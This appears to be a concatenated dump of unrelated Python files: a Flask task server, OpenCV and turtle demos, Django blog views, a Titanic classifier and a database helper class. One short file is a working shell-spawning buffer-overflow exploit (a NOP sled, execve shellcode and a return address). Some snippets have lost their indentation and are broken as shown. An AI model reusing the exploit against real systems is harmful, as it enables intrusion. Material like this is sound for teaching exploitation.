    def add(self, summary, description):
        """Store a new task and return its id."""
        task_id = self.new_id()
        self.tasks[task_id] = {
            'id': task_id,
            'summary': summary,
            'description': description,
        }
        return task_id

    def get_task(self, task_id):
        """Return the task dict, or None for an unknown id."""
        return self.tasks.get(task_id)

    def delete_task(self, task_id):
        """Remove a task; True iff it existed."""
        if task_id in self.tasks:
            del self.tasks[task_id]
            return True
        return False

    def update_task(self, task_id, summary, description):
        """Overwrite summary/description; False for an unknown id."""
        task = self.tasks.get(task_id)
        if task is None:
            return False
        task['summary'] = summary
        task['description'] = description
        return True

    def all_tasks(self):
        """Iterate over every stored task dict."""
        return iter(self.tasks.values())

    def clear(self):
        """Drop every task and reset the id counter; returns how many were dropped."""
        cleared = len(self.tasks)
        self._init_store()
        return cleared

    def _init_store(self):
        # ids restart from 0 after clear(), matching previous behaviour
        self._last_id = 0
        self.tasks = {}
class DbTaskStore(TaskStore):
    """TaskStore backed by PostgreSQL via psycopg2.

    A new connection is opened per operation; psycopg2's connection context
    manager commits on success / rolls back on error (it does not close the
    connection).
    """
    def __init__(self):
        # DSN assumes a local 'todoserver' database accessible to www-data
        self.dsn = 'dbname=todoserver user=www-data'

    def add(self, summary, description):
        """Insert a task and return its database-assigned id."""
        insert_stmt = 'INSERT INTO tasks (summary, description) VALUES (%s, %s) RETURNING id'
        with psycopg2.connect(self.dsn) as conn:
            with conn.cursor() as cur:
                cur.execute(insert_stmt, (summary, description))
                task_id = cur.fetchone()[0]
        return task_id

    def get_task(self, task_id: int):
        """Return the task row as a dict, or None if the id is unknown."""
        cols = (
            'id',
            'summary',
            'description',
        )
        select_stmt = 'select ' + ','.join(cols) + ' from tasks WHERE id = %s'
        with psycopg2.connect(self.dsn) as conn:
            with conn.cursor() as cur:
                cur.execute(select_stmt, (task_id,))
                row = cur.fetchone()
                if row is None:
                    return None
                return dict(zip(cols, row))

    def update_task(self, task_id, summary, description):
        """Overwrite summary/description; True iff exactly one row changed."""
        fields = [
            summary,
            description,
        ]
        clauses = [
            'summary = %s',
            'description = %s',
        ]
        statement = 'UPDATE tasks SET ' + ', '.join(clauses) + ' WHERE id = %s'
        fields.append(task_id)
        with psycopg2.connect(self.dsn) as conn:
            with conn.cursor() as cur:
                cur.execute(statement, fields)
                # psycopg2 exposes the affected-row count via the status string
                count = _update_count(cur.statusmessage)
        assert count in {0, 1}, count
        return count == 1

    def delete_task(self, task_id):
        """Delete a task; True iff exactly one row was removed."""
        with psycopg2.connect(self.dsn) as conn:
            with conn.cursor() as cur:
                cur.execute('DELETE FROM tasks WHERE id = %s', (task_id,))
                count = _delete_count(cur.statusmessage)
        assert count in {0, 1}, count
        return count == 1

    def all_tasks(self):
        """Yield every task row as a dict (generator; streams from the cursor)."""
        cols = (
            'id',
            'summary',
            'description',
        )
        select_stmt = 'select ' + ','.join(cols) + ' from tasks'
        with psycopg2.connect(self.dsn) as conn:
            with conn.cursor() as cur:
                cur.execute(select_stmt)
                for row in cur:
                    yield dict(zip(cols, row))

    def clear(self):
        """Delete every task; returns how many rows were removed."""
        with psycopg2.connect(self.dsn) as conn:
            with conn.cursor() as cur:
                cur.execute('DELETE FROM tasks')
                count = _delete_count(cur.statusmessage)
        return count
def _delete_count(statusmessage):
match = re.match(r'DELETE (\d+)$', statusmessage)
assert match is not None, statusmessage
return int(match.group(1))
def _update_count(statusmessage):
match = re.match(r'UPDATE (\d+)$', statusmessage)
assert match is not None, statusmessage
return int(match.group(1))
# Backend registry; 'memory' is handy for tests, 'db' for production
DEFAULT_STORE = 'db'
store_types = {
    'memory': MemoryTaskStore,
    'db': DbTaskStore,
}
assert DEFAULT_STORE in store_types
# Module-level singleton used by every route handler (swapped by init_store)
store = store_types[DEFAULT_STORE]()
def get_args():
    """Parse CLI options: --port/--host to bind, --store backend, --debug flag."""
    cli = argparse.ArgumentParser()
    cli.add_argument('--port', type=int, default=5000)
    cli.add_argument('--host', type=str, default='127.0.0.1')
    cli.add_argument('--store', choices=store_types.keys(), default=DEFAULT_STORE,
                     help='storage backend')
    cli.add_argument('--debug', action='store_true', default=False)
    return cli.parse_args()
def init_store(store_type_name):
    """Replace the module-level store with a fresh backend of the named type."""
    global store
    store = store_types[store_type_name]()
@app.route('/tasks/', methods=['GET'])
def get_tasks():
    """List every task as [{id, summary}, ...]; descriptions are omitted."""
    listing = [{'id': task['id'], 'summary': task['summary']}
               for task in store.all_tasks()]
    return json.dumps(listing)
@app.route('/tasks/<int:task_id>/', methods=['GET'])
def describe_task(task_id):
    """Return the full record for one task, or 404 if the id is unknown."""
    task = store.get_task(task_id)
    if task is not None:
        return json.dumps(task)
    return make_response('', 404)
@app.route('/tasks/', methods=['POST'])
def add_task():
    """Create a task from a JSON body {summary, description}; 201 with its id."""
    payload = request.get_json()
    new_id = store.add(payload['summary'], payload['description'])
    return make_response(json.dumps({'id': new_id}), 201)
@app.route('/tasks/ALL/', methods=['DELETE'])
def wipe_tasks():
    """Delete every task and report how many were removed."""
    removed = store.clear()
    return make_response(json.dumps({'deleted': removed}), 200)
@app.route('/tasks/<int:task_id>/', methods=['DELETE'])
def task_done(task_id):
    """Delete one task; empty 200 on success, 404 if it never existed."""
    if store.delete_task(task_id):
        return ''
    return make_response('', 404)
@app.route('/tasks/<int:task_id>/', methods=['PUT'])
def update_task(task_id):
    """Replace a task's summary/description from a JSON body; 404 if unknown."""
    payload = request.get_json()
    if store.update_task(task_id, payload['summary'], payload['description']):
        return ''
    return make_response('', 404)
if __name__ == '__main__':
    args = get_args()
    # The db backend was already instantiated at import time; only swap
    # when the memory backend was requested
    if args.store == 'memory':
        init_store(args.store)
    if args.debug:
        app.debug = True
    app.run(host=args.host, port=args.port)
|
991,234 | 1837bc17b0ce2a263ee53859b9826274f2b6e0f5 | import cv2
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
def get_object(input):
    """Threshold *input*, find contours, and draw bounding boxes around
    plausibly-sized blobs.

    :param input: single-channel (grayscale) image, mutated in place.
    :returns: the same image with rectangles drawn on it.

    Fix: the original drew on and returned the module-level global ``img``
    instead of the ``input`` parameter, so the annotated output did not match
    the image actually thresholded; unused BLACK_THRESHOLD/idx/roi removed.
    """
    LOW_SIZE_THRESHOLD = 30
    MAX_SIZE_THRESHOLD = 450
    # Denoising before thresholding
    imgray = cv2.GaussianBlur(input, (5, 5), 0)
    # Triangle auto-threshold (other techniques were tried and discarded)
    ret, thresh = cv2.threshold(imgray, 0, 255, cv2.THRESH_TRIANGLE)
    contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    for cnt in contours:
        x, y, w, h = cv2.boundingRect(cnt)
        # Skip blobs that are implausibly small or large
        if h < LOW_SIZE_THRESHOLD or w < LOW_SIZE_THRESHOLD or \
           h > MAX_SIZE_THRESHOLD or w > MAX_SIZE_THRESHOLD:
            continue
        cv2.rectangle(input, (x, y), (x + w, y + h), (200, 0, 0), 2)
    return input
# Open an image using Opencv
img = cv2.imread("image_tech/Q2.jpeg")
# Convert the image into the LAB colorspace (HSV_FULL and LUV were also tried)
# cvt_image = cv2.cvtColor(img,cv2.COLOR_BGR2HSV_FULL)
cvt_image = cv2.cvtColor(img,cv2.COLOR_BGR2LAB)
# cvt_image = cv2.cvtColor(img,cv2.COLOR_BGR2LUV)
# Save each channel of the image seperately (L, a, b)
c1 = cvt_image[:, :, 0]
c2 = cvt_image[:, :, 1]
c3 = cvt_image[:, :, 2]
# Create a new window to show all the three channels seperately
f, (ax1, ax2, ax3) = plt.subplots(1,3, figsize=(10,5))
ax1.set_title("Channel 1")
ax1.imshow(c1)
ax2.set_title("Channel 2")
ax2.imshow(c2)
ax3.set_title("Channel 3")
ax3.imshow(c3)
plt.show()
# Run the detector on the lightness channel only
im= c1
print(im.shape)
im = cv2.resize(im, (640, 480))
out = get_object(im)
# Show the (globally annotated) source image and the detector output
cv2.imshow('Threshold', img)
cv2.imshow('Output', out)
cv2.waitKey()
991,235 | d7736c6e5f7ed8305f50ffeac7845078968c26ac | import math
from exercise_4 import arc
try:
# see if Swampy is installed as a package
from swampy.TurtleWorld import *
except ImportError:
# otherwise see if the modules are on the PYTHONPATH
from TurtleWorld import *
def petal(t, r, angle):
    """Draw one petal: two mirrored arcs of radius r spanning *angle* degrees."""
    for _ in range(2):
        arc(t, r, angle)
        lt(t, 180 - angle)
def flower(t, n, r, angle):
    """Draw a flower of n petals, rotating 360/n degrees between petals."""
    turn = 360.0 / n
    for _ in range(n):
        petal(t, r, angle)
        lt(t, turn)
def move(t, length):
    """Reposition the turtle *length* units forward without drawing."""
    pu(t)
    fd(t, length)
    pd(t)
# Draw a 5-petal flower slightly offset from the origin
world = TurtleWorld()
ray = Turtle()
# Small delay so the drawing animates quickly
ray.delay = 0.001
move(ray, 10)
flower(ray, 5, 100, 60)
wait_for_user()
|
991,236 | 0c80d91f5f95ed0a069f72bcfaa1258be9178c54 | from sqlalchemy import Column, String
from models import DecBase
class User(DecBase):
    """ A user is a person who interacts with the solar network by browsing, posting, or commenting in beams.
    Attributes:
    seed: BIP32 XPrivKey used to generate Bitcoin wallets
    url: address of users personal page
    """
    __tablename__ = 'user'
    # BIP32 extended private key. NOTE(review): storing an xpriv in plaintext
    # is a key-management risk -- confirm this is intended.
    seed = Column(String)
    # The user's page address doubles as the primary key
    url = Column(String, primary_key=True, nullable=False)
|
991,237 | c80bd314d62607628bf1e0f436f000f2bad0c5a4 | from django.shortcuts import render, redirect, render_to_response
from django.http import HttpResponse, HttpResponseRedirect,Http404
from .forms import LoginForm, LogupForm, CommentForm
from .models import MyUser, Artical, Comment, Poll
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from urllib.parse import urljoin
import markdown2
# Create your views here.
def index(request):
    """Landing page: the three latest news articles plus an inline login form.

    Fix: on POST the render() results were computed but never returned, so
    the view fell through to the bottom return where ``context`` could be
    unbound (NameError).  The POST branch now returns its response.
    """
    artical_latest = Artical.objects.filter(column__column='新闻').order_by('-pub_date')[:3]
    if request.method == 'POST':
        login_form = LoginForm(request.POST)
        if login_form.is_valid():
            username = request.POST['username']
            password = request.POST['password']
            user = authenticate(username=username, password=password)
            if user is not None:
                login(request, user)
            # Re-render the page whether or not authentication succeeded
            return render(request, 'index.html', { 'login_form': login_form,
                                                   'artical_latest': artical_latest,
                                                   })
    else:
        login_form = LoginForm()
    context = { 'login_form' : login_form, 'artical_latest': artical_latest }
    return render(request,'index.html', context)
def log_in(request):
    """Standalone login page.

    Fix: the failed-login render() result was discarded, so the view could
    return None; every path now returns a response.
    """
    if request.method == 'POST':
        login_form = LoginForm(request.POST)
        if login_form.is_valid():
            username = request.POST['username']
            password = request.POST['password']
            user = authenticate(username=username, password=password)
            if user is not None:
                login(request, user)
                # Send the user back where they came from (default: /foucs/)
                url = request.POST.get('source_url', '/foucs/')
                return redirect(url)
        # Invalid credentials or invalid form: show the form again
        return render(request, 'log_in.html', { 'login_form': login_form})
    login_form = LoginForm()
    return render(request,'log_in.html',{'login_form': login_form})
def artical_detail(request, artical_id):
    """Article page: markdown-rendered body, its comments, and inline login.

    Fixes: ``Artical.DoesNotExit`` (a typo -- it raised AttributeError
    instead of catching the missing-article case) is now the real
    ``Artical.DoesNotExist``, and the POST-branch render() results are
    returned instead of being discarded.
    """
    try:
        artical = Artical.objects.get(pk=artical_id)
    except Artical.DoesNotExist:
        raise Http404('Artical does not exit!')
    content = markdown2.markdown(artical.content, extras=["code-friendly", "fenced-code-blocks", "header-ids", "toc", "metadata"])
    comments = Comment.objects.filter(artical=artical_id)
    comment_form = CommentForm()
    if request.method == 'POST':
        login_form = LoginForm(request.POST)
        if login_form.is_valid():
            username = request.POST['username']
            password = request.POST['password']
            user = authenticate(username=username, password=password)
            if user is not None:
                login(request, user)
    else:
        login_form = LoginForm()
    context = { 'artical': artical,
                'content': content,
                'comments': comments,
                'comment_form': comment_form,
                'login_form': login_form,
                }
    return render(request,'artical_detail.html',context)
@login_required(login_url='/foucs/log_in')
def comment(request, artical_id):
    """Attach a new comment to an article, then bounce back to the article.

    Fixes: ``artical.comment_nums`` was incremented but the article was never
    saved, so the counter was silently lost; an invalid form also returned
    None (a server error) -- it now redirects back without posting.
    """
    comment_form = CommentForm(request.POST)
    if comment_form.is_valid():
        user = request.user
        artical = Artical.objects.get(pk=artical_id)
        new_comment = comment_form.cleaned_data['content']
        artical.comment_nums += 1
        artical.save()  # persist the incremented counter (was missing)
        comment_a = Comment(comment_text=new_comment, artical = artical, user=user)
        comment_a.save()
    url = urljoin('/foucs/artical/', artical_id)
    return redirect(url)
@login_required(login_url='/foucs/log_in')
def poll_artical_indetail(request, artical_id):
    """Upvote an article once per user, then redirect back to the article."""
    logged_user = request.user
    artical = Artical.objects.get(pk=artical_id)
    articals = []
    polls = logged_user.poll_set.all()
    url = urljoin('/foucs/artical/', artical_id)
    # Collect every article this user has already voted on
    for poll in polls:
        articals.append(poll.artical)
    if artical in articals:
        # Already voted: no double counting
        return redirect(url)
    else:
        artical.poll_nums += 1
        artical.save()
        poll_a = Poll(user=logged_user, artical=artical)
        poll_a.save()
        return redirect(url)
def log_up(request):
    """Sign-up page.

    Fixes: the duplicate-email case silently fell through and the
    invalid-form render() was never returned (the view returned None);
    every path now returns a response.
    """
    if request.method == 'POST':
        logup_form = LogupForm(request.POST)
        if logup_form.is_valid():
            email = logup_form.cleaned_data['email']
            username = request.POST['username']
            password = request.POST['password']
            if not User.objects.filter(email = email):
                user = User.objects.create_user(username=username, password=password, email=email)
                user.save()
                return render_to_response('logup_succeed.html',{'username': user.username})
        # Duplicate email or invalid form: show the sign-up form again
        return render(request, 'log_up.html', {'logup_form': logup_form})
    logup_form = LogupForm()
    return render(request, 'log_up.html', {'logup_form': logup_form})
# Log out. The original note says this won't error even when the user is not
# logged in -- NOTE(review): @login_required redirects anonymous users first;
# confirm the decorator is intended.
@login_required
def log_out(request):
    """Log the current user out and redirect to source_url (default /foucs/)."""
    logout(request)
    url = request.POST.get('source_url', '/foucs/')
    return HttpResponseRedirect(url)
|
991,238 | 93ed55d989436d902cefb258b4ada4b4fcfcc860 | #!/usr/bin/env python
shellcode = "\x83\xec\x7f\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
nopsled = "\x90"*(80 - len(shellcode))
eip = "\xba\xf7\xff\xbf"
payload = nopsled + shellcode + eip
print payload |
991,239 | efdc34dda06c9e07d1b8ad7ad375f20ac613dc40 | import json
data = {
    'no': 1,
    'name': 'Runoob',
    'url': 'http://www.runoob.com'
}

# dict -> JSON text
serialized = json.dumps(data)
print(serialized)

# JSON text -> dict (round trip)
decoded = json.loads(serialized)
print(decoded)

# Read JSON data from a file
with open('json_example.json', 'r', encoding='utf-8') as file:
    loaded = json.load(file)
    print(loaded.__class__)

# Write the data back to a file:
# with open('json_example.json', 'w', encoding='utf-8') as file:
#     json.dump(loaded, file)
991,240 | 00d5fd442023cdaf05cde33110975438da58035f | class Solution:
def isArmstrong(self, N: int) -> bool:
k = len(str(N))
sum = 0
for ch in str(N):
sum += int(ch) ** k
if sum == N:
return True
return False
|
991,241 | 6499ed0532ca13f7a5383d101707541d3938506a |
import numpy as np
import pandas as pd
train = pd.read_csv("train.csv", dtype={"Age": np.float64}, )
test = pd.read_csv("test.csv", dtype={"Age": np.float64}, )
train.head(10)
train_corr = train.corr()
train_corr
def correct_data(train_data, test_data):
    """Impute missing Age/Fare in both frames and encode categoricals.

    The *test* frame's medians are deliberately used for both frames (see
    the original note below); returns (train_data, test_data).
    """
    # Make missing values for training data from test data as well
    for frame in (train_data, test_data):
        frame.Age = frame.Age.fillna(test_data.Age.median())
        frame.Fare = frame.Fare.fillna(test_data.Fare.median())
    return correct_data_common(train_data), correct_data_common(test_data)
def correct_data_common(titanic_data):
    """Encode categorical columns numerically, mutating and returning the frame.

    Sex: male -> 0, female -> 1.  Embarked: missing -> 'S', then
    C -> 0, S -> 1, Q -> 2.
    """
    titanic_data.Sex = titanic_data.Sex.replace({'male': 0, 'female': 1})
    titanic_data.Embarked = titanic_data.Embarked.fillna("S").replace({'C': 0, 'S': 1, 'Q': 2})
    return titanic_data
train_data, test_data = correct_data(train, test)
# Correlations after imputation/encoding
train_corr = train.corr()
train_corr
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC, LinearSVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import cross_val_score
# Grid searched only for the RandomForest entry below
parameters = {
    'n_estimators' : [5, 10, 20, 30],
    'max_depth' : [3, 5, 8],
    'random_state' : [0],
}
predictors = ["Pclass", "Sex", "Age", "Parch", "Fare", "Embarked"]
# Candidate classifiers compared by 3-fold cross-validation accuracy
models = []
models.append(("GradientBoosting", GradientBoostingClassifier(n_estimators=26)))
models.append(("LogisticRegression",LogisticRegression()))
models.append(("SVC",SVC()))
models.append(("LinearSVC",LinearSVC()))
models.append(("KNeighbors",KNeighborsClassifier()))
models.append(("DecisionTree",DecisionTreeClassifier()))
models.append(("RandomForest",GridSearchCV(RandomForestClassifier(), parameters)))
models.append(("MLPClassifier",MLPClassifier(solver='lbfgs', random_state=0)))
results = []
names = []
for name,model in models:
    result = cross_val_score(model, train_data[predictors], train_data["Survived"], cv=3)
    names.append(name)
    results.append(result)
for i in range(len(names)):
    print(names[i],results[i].mean())
##------------------------------
# NOTE(review): the final submission uses a default RandomForestClassifier,
# not the grid-searched one scored above -- confirm this is intended.
alg = RandomForestClassifier()
alg.fit(train_data[predictors], train_data["Survived"])
predictions = alg.predict(test_data[predictors])
submission = pd.DataFrame({
    "PassengerId": test_data["PassengerId"],
    "Survived": predictions
})
submission.to_csv('submission.csv', index=False)
991,242 | 24ff0619b75fc39f04a2b1c14d68dcb381c838bc | import cv2
import numpy as np
import matplotlib.pyplot as plt

# Live webcam loop: detect faces with a Haar cascade, draw boxes, and allow
# saving a snapshot ('p') or quitting ('q').
cv2.namedWindow("Camera", cv2.WINDOW_KEEPRATIO)
cam = cv2.VideoCapture(0)
if not cam.isOpened():
    raise RuntimeError("Camera broken")

# Raw string so backslashes in the Windows-style path are never interpreted
# as escape sequences.
cascade = cv2.CascadeClassifier(
    r'lectures\src\haarcascade_frontalface_default.xml')

while cam.isOpened():
    ret, frame = cam.read()
    # Fix: a failed grab returns (False, None); the original crashed in
    # cvtColor. Bail out of the loop instead.
    if not ret:
        break
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    # scaleFactor=1.3, minNeighbors=5: standard trade-off between speed and
    # false positives.
    faces = cascade.detectMultiScale(gray, 1.3, 5)
    for (x, y, w, h) in faces:
        cv2.rectangle(frame, (x, y), (x+w, y+h), (255, 0, 0), 2)
    cv2.imshow("Camera", frame)

    key = cv2.waitKey(1)
    if key == ord('p'):
        # Raw string for the same escape-sequence reason as above.
        cv2.imwrite(
            r"D:\_Progromouse\computer-vision\lectures\screen.png", frame)
    if key == ord('q'):
        break

cam.release()
cv2.destroyAllWindows()
|
991,243 | e01663632cd8b45d5dc40b1162b2fbae376c7e72 | import cv2
import numpy as np

# Compare plain binary thresholding with Gaussian adaptive thresholding.
# NOTE: imread returns None if the file is missing; this demo assumes the
# image exists next to the script.
img = cv2.imread('download.jpeg')

# Threshold the grayscale image at 10 (the original also thresholded the BGR
# image first, but that result was immediately overwritten -- dead code removed).
im2gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, threshold = cv2.threshold(im2gray, 10, 255, cv2.THRESH_BINARY)

# Adaptive threshold: per-pixel cutoff from a 115x115 Gaussian-weighted
# neighbourhood, minus constant 1.
adaptive_threshold = cv2.adaptiveThreshold(im2gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,
                                           cv2.THRESH_BINARY, 115, 1)

cv2.imshow('original', img)
cv2.imshow('threshold', threshold)
cv2.imshow('adaptive', adaptive_threshold)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
991,244 | 1ce852870bdefbb37b32284437c62122f2aedd69 | celsius = input('please input temperature in Celsius: ')
# Convert the Celsius value entered above to Fahrenheit and Kelvin.
# float() accepts the string returned by input().
fahrenheit = float(celsius) * 9 / 5 + 32
kelvin = float(celsius) + 273.15
print('degree in fahrenheit: ', fahrenheit)
print('degree in kelvin: ', kelvin)
def temperature_function(celsius):
    """Convert a Celsius temperature to Fahrenheit and Kelvin.

    Prints both conversions (matching the script above) and, as an
    improvement over the original (which returned None), also returns them
    so callers can use the values programmatically.

    Args:
        celsius: temperature in Celsius; anything float() accepts (int,
            float, or numeric string such as the result of input()).

    Returns:
        Tuple (fahrenheit, kelvin) as floats.
    """
    fahrenheit = float(celsius) * 9 / 5 + 32
    kelvin = float(celsius) + 273.15
    print('degree in fahrenheit: ', fahrenheit)
    print('degree in kelvin: ', kelvin)
    return fahrenheit, kelvin
991,245 | a9fe2d46638f0e2327b8b4ae6a7bdc64b7028c44 | #!/usr/bin/env python
# vim: set ts=2 sw=2 expandtab:
import game
from optparse import OptionParser
import sys
import random
def main():
  # Parse command-line flags, log into the game (explicitly or via stored
  # credentials), run one upgrade pass, then persist the planet cache.
  # NOTE: Python 2 script (print statements, optparse).
  parser = OptionParser()
  parser.add_option("-U", "--username", dest="username",
                    help="username of login")
  parser.add_option("-P", "--password", dest="password",
                    help="password for login")
  # --noupgrade makes this a dry run: report what would be built, build nothing.
  parser.add_option("-n", "--noupgrade", dest="doupgrade",
                    action="store_false", default=True, help="dry run")
  parser.add_option("-b", "--military", dest="military",
                    action="store_true", default=False, help="build military base")
  parser.add_option("-m", "--mindcontrol", dest="mindcontrol",
                    action="store_true", default=False, help="build mind control")
  parser.add_option("-d", "--defense", dest="defense",
                    action="store_true", default=False, help="build planetary defense")
  # Percentage of eligible planets that get defense instead of military bases
  # when both -b and -d are given.
  parser.add_option("--dp", "--defensepercent", dest="defensepercent",
                    action="store", default=30, type="int", help="ratio of defense to military bases")
  parser.add_option("-t", "--tax", dest="tax", type="float",
                    action="store", help="set tax rate")
  parser.add_option("-r", "--trade", dest="allowtrade", default=False,
                    action="store_true", help="set allow trade")
  (options, args) = parser.parse_args()
  print options
  g=game.Galaxy()
  if options.username and options.password:
    # explicit login
    g.login(options.username, options.password, force=True)
  else:
    # try to pick up stored credentials
    g.login()
  BuildUpgrades(g, options.doupgrade, options.mindcontrol, options.defense,
                options.military, options.tax, options.allowtrade, options.defensepercent)
  g.write_planet_cache()
def BuildUpgrade(p, doupgrade, upgrade):
  # Attempt (or dry-run) a single named upgrade on planet p.
  # Returns 1 if an upgrade was actually started, 0 otherwise (failure or
  # dry run), so callers can tally successful builds.
  total = 0
  if doupgrade:
    if p.start_upgrade(upgrade):
      print "\tbuilt %s at %s." % (upgrade, p.name)
      total += 1
    else:
      print "\tfailed to build %s at %s." % (upgrade, p.name)
  else:
    # Dry-run mode: report only, never call start_upgrade.
    print "\twould have built %s at %s." % (upgrade, p.name)
  return total
def BuildUpgrades(g, doupgrade, domindcontrol, dodefense, domilitary, tax, allowtrade, defensepercent=30):
  # Walk every planet in the galaxy and apply the upgrade policy:
  #  - optionally raise the tax rate / enable trade,
  #  - build the standard economic ladder gated by society level and a
  #    population threshold scaled by the actual tax rate,
  #  - optionally build mind control / military / planetary defense.
  # `doupgrade` False means dry run throughout (see BuildUpgrade).
  has_pd = []  # NOTE(review): collected nowhere below -- appears unused.
  total = 0
  for p in g.planets:
    p.load()
    print "looking at planet " + p.name
    if tax != None:
      # Only ever raises the tax rate, never lowers it.
      if p.tax < float(tax):
        print "\tsetting tax rate to " + str(tax)
        if doupgrade:
          p.set_tax(tax)
    if allowtrade:
      if p.allowtrade != True:
        print "\tenabling trade"
        if doupgrade:
          p.allow_trade()

    # ratio to skew the upgrades based on what the actual tax rate is relative to 7%
    # (population thresholds below were tuned assuming a 7% tax rate).
    taxconstant = 7 / p.tax
    #print taxconstant

    # min upgrades assuming 7% tax
    #if p.can_upgrade('Antimatter Power Plant'):
    #  total += BuildUpgrade(p, doupgrade, 'Antimatter Power Plant')
    if p.can_upgrade('Trade Incentives') and p.population >= 5000 * taxconstant:
      total += BuildUpgrade(p, doupgrade, 'Trade Incentives')
    if p.society > 10 and p.can_upgrade('Long Range Sensors 1') and p.population >= 50000 * taxconstant:
      total += BuildUpgrade(p, doupgrade, 'Long Range Sensors 1')
    if p.society > 20 and p.can_upgrade('Long Range Sensors 2') and p.population >= 150000 * taxconstant:
      total += BuildUpgrade(p, doupgrade, 'Long Range Sensors 2')
    if p.society > 40 and p.can_upgrade('Matter Synth 1') and p.population >= 400000 * taxconstant:
      total += BuildUpgrade(p, doupgrade, 'Matter Synth 1')
    if p.society > 50 and p.can_upgrade('Petrochemical Power Plant') and p.population >= 500000 * taxconstant:
      total += BuildUpgrade(p, doupgrade, 'Petrochemical Power Plant')
    if p.society > 50 and p.can_upgrade('Matter Synth 2') and p.population >= 900000 * taxconstant:
      total += BuildUpgrade(p, doupgrade, 'Matter Synth 2')
    if p.society > 50 and p.can_upgrade('Slingshot') and p.population >= 1500000 * taxconstant:
      total += BuildUpgrade(p, doupgrade, 'Slingshot')

    if domindcontrol and p.can_upgrade('Mind Control'):
      # Only build in the 75-89 society window (targets mind control at ~80).
      if p.society < 90 and p.society >= 75: # mind control at 80
        total += BuildUpgrade(p, doupgrade, 'Mind Control')

    # deal with military and defense
    # if both mil and defense are selected, try to randomly decide between the two
    if domilitary and dodefense:
      # try to distribute defense and military semi-randomly
      if p.society > 50 and p.population >= 5000000 * taxconstant:
        if p.can_upgrade('Military Base') and p.can_upgrade('Planetary Defense 1'):
          # this planet can either go military or defense
          print "planet %s can go either military or defense" % p
          # decide randomly
          # 30% (defensepercent) will go defense
          if random.randrange(0, 100) < defensepercent:
            total += BuildUpgrade(p, doupgrade, 'Planetary Defense 1')
          else:
            total += BuildUpgrade(p, doupgrade, 'Military Base')
      if p.has_upgrade('Military Base') and p.has_upgrade('Planetary Defense 1') and not p.has_upgrade('Regional Government'):
        print "WARNING: planet %s has both PD and MB, probably can't afford it" % str(p)
      # XXX special case, leave disabled
      #if p.has_upgrade('Planetary Defense 1') and not p.has_upgrade('Regional Government'):
        #print "planet %s should get PD reevaluated" % str(p)
        #if random.randrange(0, 100) >= int(defensepercent):
          #print "switching planet %s to base from defense" % str(p)
          #if doupgrade:
            #p.scrap_upgrade('Planetary Defense 1')
            #total += BuildUpgrade(p, doupgrade, 'Military Base')
    else:
      # Only one of military/defense requested: build it when eligible.
      if domilitary and p.society > 50 and p.can_upgrade('Military Base') and p.population >= 5000000 * taxconstant:
        total += BuildUpgrade(p, doupgrade, 'Military Base')
      if dodefense and p.can_upgrade('Planetary Defense 1') and p.population >= 5000000 * taxconstant:
        total += BuildUpgrade(p, doupgrade, 'Planetary Defense 1')

  print "started %d upgrades" % total
# Script entry point.
if __name__ == "__main__":
  main()
|
991,246 | b5df8ffe4028c127f66a2af7d960f6dd791f90e9 | name = input('请输入你的名字: ')
# Greet the user (name is read by the input() call above).
# Fixed user-facing typo: "wellcome" -> "welcome".
print('welcome,', name)
print("1024 * 768 =", 1024*768)
# Triple-quoted strings preserve embedded newlines.
print('''line1
line2
line3''')
# The r prefix makes a raw string: backslash escapes like \n stay literal.
print(r'''hello,\n
world''')
991,247 | c29167472c1b2cf03d2337e95724aa428408e9ef | import json
import random
import re
import string
import threading
from datetime import datetime
import psycopg2
import requests
import email_verification
import general_settings
import validater
def rand(len):  # parameter name kept for backward compatibility (shadows builtin len)
    """Return a random uppercase alphanumeric string of the given length.

    Uses random.SystemRandom (OS entropy) for each character, drawn from
    [a-zA-Z0-9] and then uppercased.

    NOTE: because lowercase letters are uppercased *after* sampling, each
    letter is twice as likely as each digit. Preserved from the original
    lambda (PEP 8 E731: converted from a lambda assignment to a def).
    """
    alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits
    rng = random.SystemRandom()
    return ''.join(rng.choice(alphabet) for _ in range(len)).upper()
class DB:
    """PostgreSQL access layer for the onpool.kr question/answer web service.

    Maintains one psycopg2 connection + cursor per thread (see getCursor),
    logs every executed query to a per-day file, and fires Discord webhooks
    and notification e-mails as side effects of several operations.

    Most query methods follow one convention: return ``[err, payload]`` where
    ``err`` is True on failure (payload is then the exception string).

    SECURITY NOTE (review): nearly every query below is assembled with
    %-interpolation or str.format instead of psycopg2 parameter binding, so
    any value that slips past hardfilter/validater is an SQL-injection
    vector. Should be migrated to ``cur.execute(sql, params)``.
    """

    def __init__(self):
        # Connection parameters come from general_settings.Settings().
        self.gSet = general_settings.Settings()
        self.host = self.gSet.host
        self.port = self.gSet.port
        self.user = self.gSet.user
        self.pw = self.gSet.pw
        self.db = self.gSet.db
        self.conn = None
        self.cursor = None
        # %s is replaced with the current date (one log file per day).
        self.logfile = "logs/db/%s.txt"
        # Per-thread connection / cursor caches keyed by thread id.
        self.connDict = {}
        self.curDict = {}
        self.getConn()

    # Fire-and-forget notification e-mail on a daemon-less worker thread.
    def send_email(self, email, title, message):
        threading.Thread(target=email_verification._send_notify, args=(email, title, message,)).start()

    # Post an embed to the hard-coded Discord webhook; returns the HTTP
    # response body as text. Blocking call (no timeout) -- TODO confirm ok.
    def _send_webhook(self, title, content, user, url, ip, colour=3447003):
        data = {
            "username": "온풀 웹서비스",
            "avatar_url": "",
            "tts": False,
            "content": "",
            "author": {
                "name": "",
                "icon_url": "",
            },
            "embeds": [
                {
                    "color": colour,
                    "title": "{}".format(title),
                    "description": "{}".format(content),
